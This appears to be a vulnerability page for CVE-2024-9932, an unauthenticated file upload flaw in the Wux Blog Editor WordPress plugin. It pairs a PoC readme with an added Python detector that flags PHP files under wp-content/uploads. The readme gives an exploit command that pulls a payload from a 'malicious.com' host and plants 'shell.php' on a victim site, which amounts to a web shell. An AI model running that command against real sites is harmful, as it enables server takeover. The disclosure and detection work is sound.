
CVE-2024-9932 PoC — WordPress plugin Wux Blog Editor code issue vulnerability

Source
Associated Vulnerability
Title: WordPress plugin Wux Blog Editor code issue vulnerability (CVE-2024-9932)
Description: WordPress and WordPress plugins are products of the WordPress Foundation. WordPress is a blogging platform developed in PHP that supports hosting a personal blog site on a server running PHP and MySQL. A WordPress plugin is an application plugin for that platform. WordPress plugin Wux Blog Editor versions 3.0.0 and earlier contain a code issue vulnerability: insufficient file type validation allows arbitrary file upload.
Readme
# CVE-2024-9932-POC


# Description:
The Wux Blog Editor WordPress plugin is vulnerable to arbitrary file uploads due to insufficient file type validation in the wuxbt_insertImageNew function. Versions up to and including 3.0.0 are affected. This vulnerability allows unauthenticated attackers to upload arbitrary files to the server, potentially leading to remote code execution (RCE).

## Vulnerability Details

The vulnerability stems from improper file type validation in the wuxbt_insertImageNew function. This allows attackers to upload malicious files to the server without authentication.

Attack Scenario:

1. Attacker identifies a website using the vulnerable plugin.
2. Exploits the file upload functionality to upload a malicious PHP shell.
3. Executes commands on the compromised server.

### Usage
```
usage: CVE-2024-9932.py [-h] -u URL -ur REMOTE_URL [-n NAME]

Wux Blog Editor - Arbitrary File Upload

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Base URL of the WordPress server, e.g., http://192.168.100.74/wordpress
  -ur REMOTE_URL, --remote-url REMOTE_URL
                        Remote file URL, e.g., http://192.168.100.54/shell.txt
  -n NAME, --name NAME  Desired file name, e.g., Nxploit.php

```
### Exploit command
```
python CVE-2024-9932.py -u http://victim-site.com/wordpress -ur http://malicious.com/payload.txt -n shell.php
```
### Results
Successful upload example:

1. File found:
```
[+] File found: http://192.168.100.74/wordpress/wp-content/uploads/2025/01/shell.php
```
2. Execution result: navigate to the file's URL to execute the payload.
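The result above shows the artifact this bug leaves behind: a PHP file under `wp-content/uploads/`, a directory that should only ever hold media. The following is an added detection example, not code from the PoC or the plugin: it flags web-server log requests for PHP-executable files under the uploads path and can also walk an on-disk uploads directory for such files. The log lines and IPs are constructed sample data.

```python
import os
import re
from pathlib import PurePosixPath
from urllib.parse import urlsplit

# Extensions a typical PHP handler executes; nothing under wp-content/uploads
# should ever carry one of these.
EXEC_EXTS = {".php", ".php3", ".php4", ".php5", ".php7", ".phtml", ".phar", ".phps"}
UPLOADS_MARKER = "/wp-content/uploads/"
# Apache/nginx combined log format: ip ident user [ts] "METHOD target proto" status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) \S+" (?P<status>\d{3})')

def has_exec_ext(name: str) -> bool:
    """Flag any PHP extension in the suffix chain: shell.php, and also
    shell.php.jpg, which some Apache AddHandler configurations execute."""
    return bool({s.lower() for s in PurePosixPath(name).suffixes} & EXEC_EXTS)

def is_executable_upload(path: str) -> bool:
    """True for a URL path or file path under wp-content/uploads with a PHP extension."""
    return UPLOADS_MARKER in path and has_exec_ext(PurePosixPath(path).name)

def flag_access_log(lines) -> list:
    """Return (client_ip, path, status) for requests to executable files under
    uploads. 404s matter too: they show probing for a file the client expected to exist."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            path = urlsplit(m["target"]).path  # drop any query string before matching
            if is_executable_upload(path):
                hits.append((m["ip"], path, int(m["status"])))
    return hits

def scan_uploads_dir(root: str) -> list:
    """Walk an on-disk uploads directory; report files with a PHP extension or
    whose first bytes contain a PHP open tag hidden behind an image name."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                head = fh.read(64)
            if has_exec_ext(name) or b"<?php" in head:
                findings.append(full)
    return findings

# Constructed sample lines (not taken from the page), Apache combined format.
SAMPLE_LOG = [
    '192.0.2.10 - - [15/Jan/2025:10:00:01 +0000] "GET /wordpress/wp-content/uploads/2025/01/shell.php HTTP/1.1" 200 512 "-" "curl/8.0"',
    '192.0.2.20 - - [15/Jan/2025:10:00:02 +0000] "GET /wordpress/wp-content/uploads/2025/01/photo.jpg HTTP/1.1" 200 8831 "-" "Mozilla/5.0"',
    '192.0.2.30 - - [15/Jan/2025:10:00:03 +0000] "GET /wordpress/wp-admin/admin.php?page=settings HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '198.51.100.5 - - [15/Jan/2025:10:00:04 +0000] "POST /wordpress/wp-content/uploads/2025/01/img.phtml HTTP/1.1" 404 196 "-" "python-requests/2.31"',
]
```

Running `flag_access_log(SAMPLE_LOG)` returns the two requests for `shell.php` and `img.phtml` and ignores the image and admin requests; pair it with a web-server rule that denies PHP execution under the uploads directory so a planted file cannot run at all.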


### Disclaimer
This tool is for educational purposes only. Unauthorized use of this script on systems without permission is illegal.



File Snapshot

```
[4.0K] /data/pocs/ef38f52d2cf94e8baad793befffe73dfe3159b07
├── [5.4K] CVE-2024-9932.py
└── [1.7K] README.md

0 directories, 2 files
```